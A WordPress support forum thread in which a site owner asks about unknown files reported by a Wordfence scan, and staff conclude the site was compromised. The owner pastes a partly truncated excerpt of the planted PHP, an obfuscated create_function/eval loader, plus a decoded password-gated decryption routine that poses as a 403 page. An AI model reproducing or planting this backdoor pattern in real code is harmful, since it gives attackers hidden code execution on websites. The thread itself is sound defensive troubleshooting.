Unknown files after Wordfence update to 6.3.10

Hi @zeno001,

Are these issues that you previously ignored?

If so, the situation is most likely related to the fix we implemented in this latest version (6.3.10).

From this version onward, the Scan summary box will say “Ignored” for previously ignored issues instead of saying “Problems found” as it used to.

At first, you will experience the following situation:

• The old ignored issues will stay in the “Ignored Issues” tab.
• New issues will appear in “New issues” for those same issues. They will appear to be duplicates of the old ignored issues.

Once those “new issues” are ignored, the new behavior will be in effect.

Thanks, wfyann. I can’t be absolutely sure, but I don’t think I had previously ignored them. The new behaviour sound like it makes more sense!

Thanks.

@zeno001,

Are these issues still reported when High Sensitivity is disabled?

Have you recently (re)enabled the “Scan wp-admin and wp-includes for files not bundled with WordPress” option?

Just disabled high sensitivity and ran a new scan: the same files were reported.

I’m not sure when I enabled that option, but it certainly wasn’t in the past week or so.

Do you know what these files are? Are the (or were they) core WP files?

Just had a look at the first file – although it looks mostly OK and is commented, there is this in the middle:

function add_registered_taxonomy() {
global $transl_dictionary;
$transl_dictionary = create_function(‘$inp,$key’,”\44\163\151\144\40\75\40\44\137\120 ….. [a long line]
if (!function_exists(“O01100llO”)) {
function O01100llO(){global $transl_dictionary;return call_user_func($transl_dictionary,’fqOf%7bI%26%26fO … [a long line]
call_user_func(create_function(”,”\x65\x76\x61l(\x4F01100llO());”));
}
}

The long lines of encoded HTML entities decodes to this:

$sid = $_POST [“sid”]; if (md5($sid) !== ‘0eee3ac0553c3c1376fa2010d8e764f5’ ) return ‘print “<!DOCTYPE HTML PUBLIC \”-//IETF//DTD HTML 2.0//EN\”><HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>You do not have permission to access this folder.<HR><ADDRESS>Click here to go to the home page</ADDRESS></BODY></HTML>”;’; $sid= crc32($sid) + $key; $inp = urldecode ($inp); $t = ”; $S =’!#$%&()*+,-./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_\'"abcdefghijklmnopqrstuvwxyz{|}~f^jAE]okI\'OzU[2&q1{3h5w_79″4p@6\s8?BgP>dFV=mD<TcS%Ze|r:lGK/uCy.Jx)HiQ! #$~(;Lt-R}Ma,NvW+Ynb*0X’; for ($i=0; $i<strlen($inp); $i++){ $c = substr($inp,$i,1); $n = strpos($S,$c,95)-95; $r = abs(fmod($sid+$i,95)); $r = $n-$r; if ($r<0) $r = $r+95; $c = substr($S, $r, 1); $t .= $c; } return $t;

To my untrained eye, this looks dodgy!

Any ideas?

Hi @zeno001,

Sorry about the delayed response.

After discussing this topic with my colleagues, we believe your site might’ve been compromised.

Some of the code you shared does look like malware and the presence of a PHP file in a folder that should only have JavaScript (Unknown file in WordPress core: wp-admin/js/edit-form-header.php) is in itself suspicious.

I strongly recommend you follow the steps outlined in our documentation

wfyann

Thanks. I’ll follow that procedure – or I may just wipe all the WP files and re-install (retaining the current database).

But if those files shouldn’t even be there (and I can see those directories are for js or css files, not php), can I just delete them rather than removing the rogue code? The only file that’s not obviously out of place is https.php in the wp-includes directory (and there is a http.php file already there).

Actually, thinking about it, it was a very small site anyway so I’ll just delete all the files and database and install from scratch and recreate it – it’ll be worth the effort.

Thanks for all your help.

• This reply was modified 7 years, 5 months ago by zeno001.